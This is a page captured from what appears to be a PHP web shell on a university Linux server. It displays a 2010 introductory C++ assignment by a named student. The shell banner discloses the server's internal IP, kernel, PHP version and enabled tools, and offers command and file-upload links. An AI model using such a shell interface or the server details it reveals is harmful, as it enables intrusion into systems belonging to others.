Server IP : 172.16.15.8 / Your IP : 52.15.136.223 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/jcwhiley/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
// // // // CS112 CS 1 Assignment 1 (i) // Due: Wednesday, Septemember 22, 2010 // // File Name: assignment1.cpp // Author: Jennifer Whiley // Instructor: Dr. Wang // // Compile: g++ assignment1.cpp (a) // Run: ./a.out // // Goal: The program will prompt and let the user input some information // #include <iostream> using namespace std; int main() { string answer; // hold the answer cout << "Which city is your hometown?"; cin >> answer; cout << "I come from " << answer << "\n"; cout << "What is your favorite sport?"; cin >> answer; cout << "My favorite sport is " << answer << "\n"; cout << "What year are you attending college?(first, second, third, fourth, or more)"; cin >> answer; cout << "This is my " << answer << "\n"; cout << "What is your current major?"; cin >> answer; cout << "My current major is " << answer << "\n"; cout << "What is your favorite season of the year? (spring, fall, summer, winter)"; cin >> answer; cout << "My favorite season of the year is " << answer << "\n"; return 0; }